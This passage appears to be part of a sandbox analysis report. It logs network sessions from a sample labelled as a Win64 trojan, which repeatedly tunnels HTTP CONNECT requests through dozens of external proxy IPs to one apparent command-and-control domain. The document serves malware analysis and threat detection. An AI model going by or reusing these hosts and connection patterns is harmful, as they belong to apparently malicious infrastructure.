                                                                                710192.168.2.852246103.216.49.15180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.957285881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.306919098 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                711192.168.2.852254103.23.100.141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.957285881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                712192.168.2.852207194.233.78.142471525828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.957659960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                713192.168.2.852358109.238.12.156469625828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.957787991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.392967939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.876224995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.847747087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.781635046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.695029020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695071936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492172003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                714192.168.2.85227143.133.80.236156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.958627939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                715192.168.2.852330110.12.211.140805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.959604979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                716192.168.2.85095091.134.140.160573205828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.960164070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991853952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.992201090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.991969109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                717192.168.2.852284103.57.211.9231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.963854074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.491533041 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                718192.168.2.85101141.128.89.8619765828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.000971079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991853952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.085747004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.141154051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.147905111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:03.147849083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:15.240746021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                719192.168.2.852304196.0.111.186460485828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.022056103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                720192.168.2.851863201.46.29.11556785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.022222996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                721192.168.2.852265103.127.1.130805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.028300047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                722192.168.2.850984176.197.103.5841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.035114050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                723192.168.2.850963201.238.248.13992295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.035414934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.194966078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.288908958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.382577896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                724192.168.2.852326123.126.158.50805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.037157059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                725192.168.2.85235558.234.116.19781975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.042254925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                726192.168.2.852264118.91.175.14656785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.042256117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                727192.168.2.85235247.74.152.2988885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.106266022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                728192.168.2.852354102.132.57.9080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.106720924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                729192.168.2.852353125.19.99.9041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.110440016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                730192.168.2.850990117.4.242.21656785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.123732090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                731192.168.2.85236320.44.189.18431295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.123853922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.385456085 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                732192.168.2.85176172.195.34.5841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.123881102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                733192.168.2.851937162.253.68.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.124268055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                734192.168.2.851922112.30.155.83127925828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.124269009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.148437023 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:28:30.445949078 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                735192.168.2.851894164.90.184.248805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.124541998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.139769077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.195039988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.255172968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                736192.168.2.85098243.255.113.232845828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.126674891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.495706081 CET208INHTTP/1.0 404 Not Found
                                                                                Server: HCS
                                                                                Date: Fri, 23 Feb 2024 16:16:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 432
                                                                                HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                X-NGAA: MISS from CH-XW-NO1-315.4
                                                                                Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                737192.168.2.852361171.248.213.12110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.151932955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                738192.168.2.852368115.74.159.3910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.156549931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                739192.168.2.85190931.217.221.7481925828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.188472033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                740192.168.2.852379170.106.193.128300015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.188908100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                741192.168.2.851123186.203.163.5356785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.202877045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                742192.168.2.852387104.20.24.214805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.203638077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.291273117 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                743192.168.2.852396172.65.165.93300005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.226149082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                744192.168.2.852374210.211.113.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.245342016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                745192.168.2.852381185.49.31.20780815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.260652065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                746192.168.2.852369113.204.4.142108005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.277812004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                747192.168.2.85239472.210.252.13741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.311167002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                748192.168.2.85186723.92.223.12231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.325846910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                749192.168.2.852212192.111.139.163194045828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.349967957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                750192.168.2.852438185.162.231.226805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.350441933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.438432932 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                751192.168.2.851988190.216.234.1869995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
